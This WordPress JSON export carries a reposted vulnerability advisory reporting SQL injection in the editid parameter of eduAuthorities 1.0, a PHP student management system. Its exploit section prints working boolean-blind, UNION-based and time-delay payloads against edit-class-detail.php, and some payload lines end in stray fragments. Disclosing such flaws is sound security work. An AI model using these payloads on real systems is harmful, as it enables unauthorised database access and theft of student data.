{"id":58655,"date":"2024-08-06T17:19:51","date_gmt":"2024-08-06T14:19:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179919\/eduauthorities10-sql.txt"},"modified":"2024-08-06T17:19:51","modified_gmt":"2024-08-06T14:19:51","slug":"eduauthorities-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/eduauthorities-1-0-sql-injection\/","title":{"rendered":"eduAuthorities 1.0 SQL Injection"},"content":{"rendered":"<p>## Titles: eduAuthorities-1.0 Multiple-SQLi<br \/>## Author: nu11secur1ty<br \/>## Date: 07\/29\/2024<br \/>## Vendor: https:\/\/www.mayurik.com\/<br \/>## Software:<br \/>https:\/\/www.sourcecodester.com\/php\/16137\/online-student-management-system-php-free-download.html<br \/>## Reference: https:\/\/portswigger.net\/web-security\/sql-injection<\/p>\n<p>## Description:<br \/>The editid parameter appears to be vulnerable to SQL injection attacks. The<br \/>payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each<br \/>submitted in the editid parameter. These two requests resulted in different<br \/>responses, indicating that the input is being incorporated into a SQL query<br \/>in an unsafe way. Note that automated difference-based tests for SQL<br \/>injection flaws can often be unreliable and are prone to false positive<br \/>results. You should manually review the reported requests and responses to<br \/>confirm whether a vulnerability is actually present.<br \/>Additionally, the payload (select*from(select(sleep(20)))a) was submitted<br \/>in the editid parameter. 
The application took 20011 milliseconds to respond<br \/>to the request, compared with 3 milliseconds for the original request,<br \/>indicating that the injected SQL command caused a time delay. The attacker<br \/>can get all information from the system by using this vulnerability!<\/p>\n<p>STATUS: HIGH- Vulnerability<\/p>\n[+]Exploits:<br \/>&#8211; SQLi Multiple:<br \/>```mysql<br \/>&#8212;<br \/>Parameter: #1* (URI)<br \/>Type: boolean-based blind<br \/>Title: MySQL OR boolean-based blind &#8211; WHERE, HAVING, ORDER BY or GROUP<br \/>BY clause (EXTRACTVALUE)<br \/>Payload: http:\/\/pwnedhost.com\/eduauth\/edit-class-detail.php?editid=-8488<br \/>OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#<br \/>UiVZfrom(select(sleep(3)))a)<\/p>\n<p>Type: UNION query<br \/>Title: MySQL UNION query (random number) &#8211; 3 columns<br \/>Payload: http:\/\/pwnedhost.com\/eduauth\/edit-class-detail.php?editid=-2962<br \/>UNION ALL SELECT<br \/>8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)<br \/>&#8212;<br \/>```<\/p>\n<p>## Reproduce:<br \/>[href](https:\/\/www.patreon.com\/posts\/eduauthorities-1-109562178)<\/p>\n<p>## More:<br \/>[href](<br \/>https:\/\/www.nu11secur1ty.com\/2024\/08\/eduauthorities-10-multiple-sqli.html)<\/p>\n<p>## Time spent:<br \/>00:37:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Titles: eduAuthorities-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 07\/29\/2024 ## Vendor: https:\/\/www.mayurik.com\/ ## Software: https:\/\/www.sourcecodester.com\/php\/16137\/online-student-management-system-php-free-download.html ## Reference: https:\/\/portswigger.net\/web-security\/sql-injection ## Description: The editid parameter appears to be vulnerable to SQL injection attacks. The payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each submitted in the editid parameter. 
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58655","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58655","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58655"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58655\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58655"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58655"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58655"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}